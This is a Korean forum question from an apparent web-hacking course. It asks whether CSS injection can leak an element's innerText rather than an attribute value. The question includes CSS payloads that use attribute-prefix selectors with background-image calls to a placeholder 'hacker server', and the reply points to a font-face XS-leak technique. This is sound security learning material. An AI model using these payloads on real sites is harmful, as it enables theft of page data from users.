완료됨
태그의 innerText value를 가져와 CSS Injection 공격이 가능할까요?
태그의 innerText value를 가져와 CSS Injection 공격이 가능할까요?
<style>
span[class=name][???] { // * point
color: red;
background-image: url('hacker server');
}
</style>
<style>
input[class=name][value ^= a] {
color: red;
background-image: url('hacker server');
}
</style>
<span class="name"> 1234 </span>
<input class="test" value="abc">
이런 코드가 있을 때 style 태그로만 1234의 값을 가지고 올 수 있을지 궁금합니다.
강의에서는 속성 값을 이용해서 가져오고, 구글에서 찾아봐도 보통
<span data-get="1234"> 1234 </span>
span[data-get="1234"] { ... }
이런식으로 따로 또 속성을 정의해서 가져오더라구요.
DOM으로 innerText라는 값에 의해서 읽을 수 있던데
document.getElementsByClassName("test")[0].innerText
// '1234'
CSS로는 태그의 innerText 값의 접근이 불가능할까요?
#웹해킹
#심화
#css_injection
작성자 정보
답변
1
as3617
워게임 고인물
이런 case에선 selector를 이용한 공격은 불가능하지만 font-face를 이용하여 xs-leak을 시도하면 태그 내 innerText value에 접근하는 것이 가능합니다.